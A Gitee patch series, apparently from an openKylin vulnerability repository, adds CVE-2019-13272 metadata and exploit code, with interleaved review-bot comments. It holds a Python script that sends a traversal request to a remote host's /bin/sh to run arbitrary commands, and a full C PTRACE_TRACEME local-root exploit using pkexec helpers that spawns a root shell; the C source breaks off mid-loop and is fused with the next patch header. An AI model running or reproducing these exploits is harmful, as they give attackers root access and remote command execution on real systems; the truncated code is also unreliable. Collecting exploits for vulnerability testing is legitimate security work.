From d7860cd52ba2427c3d2361f26b49f264da372b42 Mon Sep 17 00:00:00 2001 From: LiSijia Date: Wed, 15 Mar 2023 14:44:54 +0800 Subject: [PATCH 1/5] Add CVE-2019-13272 --- .../2019/CVE-2019-13272/cve-2019-13272.py | 34 ++++++++++++++ .../2019/yaml/CVE-2019-13272.yaml | 44 +++++++++++++++++++ openkylin_list.yaml | 1 + 3 files changed, 79 insertions(+) create mode 100644 cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py create mode 100644 cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
diff --git a/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py
new file mode 100644
index 00000000..6125eaf4
--- /dev/null
+++ b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py
@@ -0,0 +1,34 @@
+#! /usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import socket,binascii,re,sys
+
+def send(host,port,cmd):
+
+ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.connect((host,int(port)))
+ data = '''\x50\x4f\x53\x54\x20\x2f\x2e\x25\x30\x64\x2e\x2f\x2e\x25\x30\x64\x2e\x2f\x2e\x25\x30\x64\x2e\x2f\x2e\x25\x30\x64\x2e\x2f\x62\x69\x6e\x2f\x73\x68\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x31\x0d\x0a\x0d\x0a\x65\x63\x68\x6f\x0a\x65\x63\x68\x6f\x0a'''
+ str_16 = binascii.b2a_hex(cmd.encode('utf-8'))
+ b=re.findall(r'.{2}',str_16)
+ c = '\\x'.join(b)
+ cdata = '\\x' + c
+ ddata = '\x20\x32\x3e\x26\x31\x0a'
+ data = data + cmd + ddata
+ #print data
+ s.send(data)
+ resp = ''
+ buf=s.recv(40890)
+ while buf:
+ resp = resp + buf
+ buf=s.recv(40890)
+ ress = re.findall(r'HTTP[\s\S]*?close',resp)
+ print resp.replace(ress[0],'').strip()
+
+if __name__ == "__main__":
+ if len(sys.argv) < 3:
+ print sys.argv[0] +" host port cmd"
+ else:
+ host = sys.argv[1]
+ port = sys.argv[2]
+ cmd = sys.argv[3]
+ send(host,port,cmd)
\ No newline at end of file
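Review bot: The added cve-2019-13272.py does not implement the CVE it is filed under: CVE-2019-13272 is a local ptrace_link credential bug (as this series' YAML description and the C file added in patch 4/5 both state), whereas this script is a Python 2 HTTP client that posts a command string to a remote host and prints the reply, with no ptrace involvement, so the file should not ship under this identifier. If it is kept anyway, the argument guard is off by one, since `sys.argv[3]` is read on the else branch: `if len(sys.argv) < 4:`. `cdata` is computed and never used, `ress[0]` raises IndexError whenever the regex finds no match, and the socket is never closed, which `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` would fix. The `print` statements and `s.send(data)` on a `str` also pin the script to Python 2 despite the unversioned `#! /usr/bin/env python` shebang; patch 4/5 in this series deletes the file, which looks like the right outcome.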
diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
new file mode 100644
index 00000000..dc26ee8b
--- /dev/null
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
@@ -0,0 +1,44 @@
+id: CVE-2019-13272
+source: https://github.com/polosec/CVE-2019-13272
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ Linux kernel 5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的ptrace_link没有正确处理对凭证的记录,攻击者利用该漏洞可以将普通用户权限提权为root权限。
+ scope-of-influence:
+ 3.16.52 <= Linux kernel < 5.1.17
+ reference:
+ - http://packetstormsecurity.com/files/153663/Linux-PTRACE_TRACEME-Broken-Permission-Object-Lifetime-Handling.html
+ - http://packetstormsecurity.com/files/153702/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html
+ - http://packetstormsecurity.com/files/154245/Kernel-Live-Patch-Security-Notice-LSN-0054-1.html
+ - http://packetstormsecurity.com/files/154957/Linux-Polkit-pkexec-Helper-PTRACE_TRACEME-Local-Root.html
+ - http://packetstormsecurity.com/files/156929/Linux-PTRACE_TRACEME-Local-Root.html
+ - http://packetstormsecurity.com/files/165051/Linux-Kernel-5.1.x-PTRACE_TRACEME-pkexec-Local-Privilege-Escalation.html
+ - https://access.redhat.com/errata/RHSA-2019:2405
+ - https://access.redhat.com/errata/RHSA-2019:2411
+ - https://access.redhat.com/errata/RHSA-2019:2809
+ - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+ - https://bugzilla.redhat.com/show_bug.cgi?id=1730895
+ - https://bugzilla.suse.com/show_bug.cgi?id=1140671
+ - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.1.17
+ - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6994eefb0053799d2e07cd140df6c2ea106c41ee
+ - https://github.com/torvalds/linux/commit/6994eefb0053799d2e07cd140df6c2ea106c41ee
+ - https://lists.debian.org/debian-lts-announce/2019/07/msg00022.html
+ - https://lists.debian.org/debian-lts-announce/2019/07/msg00023.html
+ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGRK5LYWBJ4E4SRI4DKX367NHYSI3VOH/
+ - https://seclists.org/bugtraq/2019/Jul/30
+ - https://seclists.org/bugtraq/2019/Jul/33
+ - https://security.netapp.com/advisory/ntap-20190806-0001/
+ - https://support.f5.com/csp/article/K91025336
+ - https://support.f5.com/csp/article/K91025336?utm_source=f5support&utm_medium=RSS
+ - https://usn.ubuntu.com/4093-1/
+ - https://usn.ubuntu.com/4094-1/
+ - https://usn.ubuntu.com/4095-1/
+ - https://usn.ubuntu.com/4117-1/
+ - https://usn.ubuntu.com/4118-1/
+ - https://www.debian.org/security/2019/dsa-4484
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2019-13272
+ cwe-id: CWE-269
+ tags: root,提权
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a8b7367..9600e55a 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -43,6 +43,7 @@ cve:
 - CVE-2022-2078
 - CVE-2022-25265
 - CVE-2022-41218
+ - CVE-2019-13272
 sudo:
 - CVE-2021-3156
 - CVE-2023-22809
-- Gitee
From 2bbb5a8f129723d7373daeeb676bca683fa7057e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Wed, 15 Mar 2023 08:54:51 +0000 Subject: [PATCH 2/5] update cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml | 2 ++ 1 file changed, 2 insertions(+)
diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
index dc26ee8b..241a9599 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
@@ -41,4 +41,6 @@ info:
 cvss-score: 7.8
 cve-id: CVE-2019-13272
 cwe-id: CWE-269
+ cnvd-id: None
+ kve-id: None
 tags: root,提权
\ No newline at end of file
-- Gitee
From d1f656ceb4ba1729d5ad53062d76394f16eb400e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Wed, 15 Mar 2023 08:57:00 +0000 Subject: [PATCH 3/5] update cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
index 241a9599..b825b120 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
@@ -43,4 +43,4 @@ info:
 cwe-id: CWE-269
 cnvd-id: None
 kve-id: None
- tags: root,提权
\ No newline at end of file
+ tags: root, 提权
\ No newline at end of file
-- Gitee
From 1dda920f817ae77e4b77753d110ba4f65d00d061 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9D=8E=E6=80=9D=E4=BD=B3?= Date: Wed, 15 Mar 2023 09:04:04 +0000 Subject: [PATCH 4/5] update cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- .../2019/CVE-2019-13272/cve-2019-13272.c | 390 ++++++++++++++++++ .../2019/CVE-2019-13272/cve-2019-13272.py | 34 -- 2 files changed, 390 insertions(+), 34 deletions(-) create mode 100644 cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c delete mode 100644 cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.py
diff --git a/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c
new file mode 100644
index 00000000..05bdd608
--- /dev/null
+++ b/cve/linux-kernel/2019/CVE-2019-13272/cve-2019-13272.c
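Review bot: `scope-of-influence: 3.16.52 <= Linux kernel < 5.1.17` is inconsistent with the rest of this series: the `description` block gives only an upper bound (5.1.17之前版本), and the C file added in patch 4/5 announces itself as `Linux 4.10 < 5.1.17`, so the lower bound should either be corrected or backed by one of the `reference` links (the kernel ChangeLog and upstream commit entries are the natural sources). The file is also created without a trailing newline (`\ No newline at end of file`), which patches 2/5 and 3/5 then carry through their `tags:` edits; ending the file with a newline avoids that churn on every later touch.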
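Review bot: `cnvd-id: None` and `kve-id: None` record a missing identifier as the literal string `None`, because YAML has no `None` keyword; any consumer that tests these fields for null will see a non-empty value and treat it as an id. Use YAML null (`cnvd-id: ~`, `kve-id: ~`) or omit the keys, following whatever convention the other entries in this repository already use, which is not visible in this series.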
@@ -0,0 +1,390 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DEBUG + +#ifdef DEBUG +# define dprintf printf +#else +# define dprintf +#endif + +#define SAFE(expr) ({ \ + typeof(expr) __res = (expr); \ + if (__res == -1) { \ + dprintf("[-] Error: %s\n", #expr); \ + return 0; \ + } \ + __res; \ +}) +#define max(a,b) ((a)>(b) ? (a) : (b)) + +static const char *SHELL = "/bin/bash"; + +static int middle_success = 1; +static int block_pipe[2]; +static int self_fd = -1; +static int dummy_status; +static const char *helper_path; +static const char *pkexec_path = "/usr/bin/pkexec"; +static const char *pkaction_path = "/usr/bin/pkaction"; +struct stat st; + +const char *helpers[1024]; + +const char *known_helpers[] = { + "/usr/lib/gnome-settings-daemon/gsd-backlight-helper", + "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper", + "/usr/lib/unity-settings-daemon/usd-backlight-helper", + "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper", + "/usr/sbin/mate-power-backlight-helper", + "/usr/bin/xfpm-power-backlight-helper", + "/usr/bin/lxqt-backlight_backend", + "/usr/libexec/gsd-wacom-led-helper", + "/usr/libexec/gsd-wacom-oled-helper", + "/usr/libexec/gsd-backlight-helper", + "/usr/lib/gsd-backlight-helper", + "/usr/lib/gsd-wacom-led-helper", + "/usr/lib/gsd-wacom-oled-helper", +}; + +/* temporary printf; returned pointer is valid until next tprintf */ +static char *tprintf(char *fmt, ...) { + static char buf[10000]; + va_list ap; + va_start(ap, fmt); + vsprintf(buf, fmt, ap); + va_end(ap); + return buf; +} + +/* + * fork, execute pkexec in parent, force parent to trace our child process, + * execute suid executable (pkexec) in child. 
+ */ +static int middle_main(void *dummy) { + prctl(PR_SET_PDEATHSIG, SIGKILL); + pid_t middle = getpid(); + + self_fd = SAFE(open("/proc/self/exe", O_RDONLY)); + + pid_t child = SAFE(fork()); + if (child == 0) { + prctl(PR_SET_PDEATHSIG, SIGKILL); + + SAFE(dup2(self_fd, 42)); + + /* spin until our parent becomes privileged (have to be fast here) */ + int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY)); + char *needle = tprintf("\nUid:\t%d\t0\t", getuid()); + while (1) { + char buf[1000]; + ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0)); + buf[buflen] = '\0'; + if (strstr(buf, needle)) break; + } + + /* + * this is where the bug is triggered. + * while our parent is in the middle of pkexec, we force it to become our + * tracer, with pkexec's creds as ptracer_cred. + */ + SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL)); + + /* + * now we execute a suid executable (pkexec). + * Because the ptrace relationship is considered to be privileged, + * this is a proper suid execution despite the attached tracer, + * not a degraded one. + * at the end of execve(), this process receives a SIGTRAP from ptrace. 
+ */ + execl(pkexec_path, basename(pkexec_path), NULL); + + dprintf("[-] execl: Executing suid executable failed"); + exit(EXIT_FAILURE); + } + + SAFE(dup2(self_fd, 0)); + SAFE(dup2(block_pipe[1], 1)); + + /* execute pkexec as current user */ + struct passwd *pw = getpwuid(getuid()); + if (pw == NULL) { + dprintf("[-] getpwuid: Failed to retrieve username"); + exit(EXIT_FAILURE); + } + + middle_success = 1; + execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name, + helper_path, + "--help", NULL); + middle_success = 0; + dprintf("[-] execl: Executing pkexec failed"); + exit(EXIT_FAILURE); +} + +/* ptrace pid and wait for signal */ +static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) { + struct user_regs_struct regs; + struct iovec iov = { .iov_base = ®s, .iov_len = sizeof(regs) }; + SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL)); + SAFE(waitpid(pid, &dummy_status, 0)); + SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov)); + + /* set up indirect arguments */ + unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL; + struct injected_page { + unsigned long argv[2]; + unsigned long envv[1]; + char arg0[8]; + char path[1]; + } ipage = { + .argv = { scratch_area + offsetof(struct injected_page, arg0) } + }; + strcpy(ipage.arg0, arg0); + for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) { + unsigned long pdata = ((unsigned long *)&ipage)[i]; + SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long), + (void*)pdata)); + } + + /* execveat(exec_fd, path, argv, envv, flags) */ + regs.orig_rax = __NR_execveat; + regs.rdi = exec_fd; + regs.rsi = scratch_area + offsetof(struct injected_page, path); + regs.rdx = scratch_area + offsetof(struct injected_page, argv); + regs.r10 = scratch_area + offsetof(struct injected_page, envv); + regs.r8 = AT_EMPTY_PATH; + + SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov)); + SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL)); + SAFE(waitpid(pid, &dummy_status, 0)); +} + +static int middle_stage2(void) { + 
/* our child is hanging in signal delivery from execve()'s SIGTRAP */ + pid_t child = SAFE(waitpid(-1, &dummy_status, 0)); + force_exec_and_wait(child, 42, "stage3"); + return 0; +} + +// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * * + +static int spawn_shell(void) { + SAFE(setresgid(0, 0, 0)); + SAFE(setresuid(0, 0, 0)); + execlp(SHELL, basename(SHELL), NULL); + dprintf("[-] execlp: Executing shell %s failed", SHELL); + exit(EXIT_FAILURE); +} + +// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * * + +static int check_env(void) { + const char* xdg_session = getenv("XDG_SESSION_ID"); + + dprintf("[.] Checking environment ...\n"); + + if (stat(pkexec_path, &st) != 0) { + dprintf("[-] Could not find pkexec executable at %s", pkexec_path); + exit(EXIT_FAILURE); + } + if (stat(pkaction_path, &st) != 0) { + dprintf("[-] Could not find pkaction executable at %s", pkaction_path); + exit(EXIT_FAILURE); + } + if (xdg_session == NULL) { + dprintf("[!] Warning: $XDG_SESSION_ID is not set\n"); + return 1; + } + if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) { + dprintf("[!] Warning: Could not find active PolKit agent\n"); + return 1; + } + if (stat("/usr/sbin/getsebool", &st) == 0) { + if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) { + dprintf("[!] Warning: SELinux deny_ptrace is enabled\n"); + return 1; + } + } + + dprintf("[~] Done, looks good\n"); + + return 0; +} + +/* + * Use pkaction to search PolKit policy actions for viable helper executables. + * Check each action for allow_active=yes, extract the associated helper path, + * and check the helper path exists. 
+ */ +int find_helpers() { + char cmd[1024]; + snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path); + FILE *fp; + fp = popen(cmd, "r"); + if (fp == NULL) { + dprintf("[-] Failed to run: %s\n", cmd); + exit(EXIT_FAILURE); + } + + char line[1024]; + char buffer[2048]; + int helper_index = 0; + int useful_action = 0; + static const char *needle = "org.freedesktop.policykit.exec.path -> "; + int needle_length = strlen(needle); + + while (fgets(line, sizeof(line)-1, fp) != NULL) { + /* check the action uses allow_active=yes*/ + if (strstr(line, "implicit active:")) { + if (strstr(line, "yes")) { + useful_action = 1; + } + continue; + } + + if (useful_action == 0) + continue; + useful_action = 0; + + /* extract the helper path */ + int length = strlen(line); + char* found = memmem(&line[0], length, needle, needle_length); + if (found == NULL) + continue; + + memset(buffer, 0, sizeof(buffer)); + for (int i = 0; found[needle_length + i] != '\n'; i++) { + if (i >= sizeof(buffer)-1) + continue; + buffer[i] = found[needle_length + i]; + } + + if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 || + strstr(&buffer[0], "/cpugovctl") != 0 || + strstr(&buffer[0], "/package-system-locked") != 0 || + strstr(&buffer[0], "/cddistupgrader") != 0) { + dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]); + continue; + } + + /* check the path exists */ + if (stat(&buffer[0], &st) != 0) + continue; + + helpers[helper_index] = strndup(&buffer[0], strlen(buffer)); + helper_index++; + + if (helper_index >= sizeof(helpers)/sizeof(helpers[0])) + break; + } + + pclose(fp); + return 0; +} + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * + +int ptrace_traceme_root() { + dprintf("[.] 
Using helper: %s\n", helper_path); + + /* + * set up a pipe such that the next write to it will block: packet mode, + * limited to one packet + */ + SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT)); + SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000)); + char dummy = 0; + SAFE(write(block_pipe[1], &dummy, 1)); + + /* spawn pkexec in a child, and continue here once our child is in execve() */ + dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path); + static char middle_stack[1024*1024]; + pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack), + CLONE_VM|CLONE_VFORK|SIGCHLD, NULL)); + if (!middle_success) return 1; + + /* + * wait for our child to go through both execve() calls (first pkexec, then + * the executable permitted by polkit policy). + */ + while (1) { + int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY); + char buf[16]; + int buflen = SAFE(read(fd, buf, sizeof(buf)-1)); + buf[buflen] = '\0'; + *strchrnul(buf, '\n') = '\0'; + if (strncmp(buf, basename(helper_path), 15) == 0) + break; + usleep(100000); + } + + /* + * our child should have gone through both the privileged execve() and the + * following execve() here + */ + dprintf("[.] Tracing midpid ...\n"); + SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL)); + SAFE(waitpid(midpid, &dummy_status, 0)); + dprintf("[~] Attached to midpid\n"); + + force_exec_and_wait(midpid, 0, "stage2"); + exit(EXIT_SUCCESS); +} + +int main(int argc, char **argv) { + if (strcmp(argv[0], "stage2") == 0) + return middle_stage2(); + if (strcmp(argv[0], "stage3") == 0) + return spawn_shell(); + + dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n"); + + check_env(); + + if (argc > 1 && strcmp(argv[1], "check") == 0) { + exit(0); + } + + /* Search for known helpers defined in 'known_helpers' array */ + dprintf("[.] Searching for known helpers ...\n"); + for (int i=0; i Date: Wed, 15 Mar 2023 09:19:54 +0000 Subject: [PATCH 5/5] update cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml. 
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 李思佳 --- cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
index b825b120..797969a3 100644
--- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml
@@ -1,5 +1,5 @@
 id: CVE-2019-13272
-source: https://github.com/polosec/CVE-2019-13272
+source: https://github.com/Cyc1eC/CVE-2019-13272
 info:
 name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
 severity: high
-- Gitee